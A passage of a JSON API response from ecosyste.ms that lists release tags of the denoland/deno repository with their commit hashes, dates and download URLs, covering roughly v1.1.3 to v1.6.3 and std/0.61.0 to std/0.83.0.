cosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/